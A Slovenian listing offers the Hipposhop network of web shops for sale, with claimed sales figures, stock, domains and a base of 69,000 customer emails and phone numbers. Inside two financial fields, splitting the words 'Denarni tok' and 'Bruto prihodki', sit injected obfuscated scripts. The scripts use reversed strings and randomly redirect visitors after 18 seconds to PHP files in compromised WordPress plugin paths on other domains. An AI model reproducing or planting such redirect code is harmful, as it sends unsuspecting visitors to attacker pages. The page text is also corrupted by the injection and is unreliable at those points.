SISTEM spletnih trgovin + ZALOGE =PREKO MILIJON EVROV PRODAJE

 Trgovina

Zaradi prestrukturiranja, pomanjkanja kapacitet in poslovnih priložnosti, ki so se nam ponudile v letu 2022 smo se odločili prodati utečen posel spletne prodaje.

Ne gre za preprosto trgovino ampak za sistem trgovin, ki je že naredil kar 75339 nakupov 100836 prodanih artiklov in 1.891939,35€ prodaje v roku 3 let.

V bazi kupcev z emaili in telefonskimi številkami je tako 69.000 kupcev iz teh držav največ prav iz Slovenije. Trgovine imajo za seboj 3 leta poslovanja in ad spend, na facebooku in instagramu, ki je težek nekaj 100.000 evrov.

Spletna trgovina Hipposhop.si/hr/it/sk/hu je za vsakogar, ki želi izkoristiti priložnost 21. Stoletja in zagotoviti že utečen posel v porastu z 5 ali več-kratno rastjo. Ne samo, da spletna trgovina zahteva izjemno nizke fiksne stroške temveč je odporna na vse gospodarske in ostale težave na svetu.

Spletna prodaja je posel prihodnosti in idealna priložnost za vse ki želijo odlično donosnost z čim manj dela.

Zakaj se bi odločili za ravno našo spletno trgovino?
-Že Utečen in Aktiven Posel
– mreža 5-ih aktivnih trgovin na katere umestite ponudbo
– skupaj z unikatno in razvito temo in prodajnim sistemom, ki je v razvoju stala več kot 35.000 € ( upselli po nakupu, v košarici in dodatni trigerji kot so odštevalniki časa, količinski popusti in kuponi)
– za skoraj 100.000 € nabavne vrednosti super izdelkov, ki že imajo dobro prodajo
-vse ostale urejene pogodbe za nemoteno poslovanje.
– veliko grafik in videov- urejenih prav za oglaševanje izdelkov.
– Baza Strank 69000+

-Google Analitike na vsaki izmed domen

-Dolgoročni Dobavitelji z Velikimi Zalogami

– lista top-sellerjev in neizkoriščenih potencialov (ocenjena na 200.000€ letnih prihodkov)

– možnost nadaljevanja sodelovanja z marketing ekipo

KAJ DOBITE OB NAKUPU?

V tem kompletu se dobi kot omenjeno nabavne vrednost zalog, 5 domen, bazo obstoječih strank za email ipd. Ter seveda know-how in uvajanje 3-4 ure in vse direktne kontakte tujih dostavnih služb GLS za boljše cene. Dobite tudi dobavitelje iz EU in celega sveta. Skratka vse na ključ za štart takoj.

Gre za pravi sistem direktne prodaje – ki je praksi potrjen. Sistem je narejen za velike obsege prodaje in strani prodajno usmerjene z upsell dodatki (prave prodajne mašine so produktne strani) in pa tudi košarica in checkout, ki so prilagojeni za dodajanje vrednosti nakupa, ki se giblje med 30-40 € odvisno od meseca.

+DODAMO ŠE 1 SISTEM SPLETNIH TRGOVIN!!!

Dodamo še pa star sistem 6 trgovin s podobne tematike ki je delovala do 2021 na teh pikslih smo ustvarili za 1.200.000 € prometa 49 različnih kupcev in ustvarili ogromno uspehov leta 2021, ko smo postavilo novo trgovini z vsemi željenimi dodatki smo tudi šli v rebranding in sčasoma zaradi istih izdelkov v starem sistemu nehali oglaševat. Zraven pridejo tudi baze kupcev, celoten know how, email marketing 1 domeno in 6 odličnih spletnih trgovin za države: SI, HR, HU, SK, CZ, PL.

  • Listing ID: 2037
  • Vključuje: Blagovna znamka, Know-how, Dogovori s kupci, Dogovori z dobavitelji, Pogodbe, Zaloge, Spletna stran, Mobilne aplikacije
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2018
  • Denarni <script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tok: 1800000
  • Bru<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to prihodki: 1300000
  • Zaloge (MPC): 50000
Contact details

 Show Phone Number ***** http://hipposhop.si

Contact this listing owner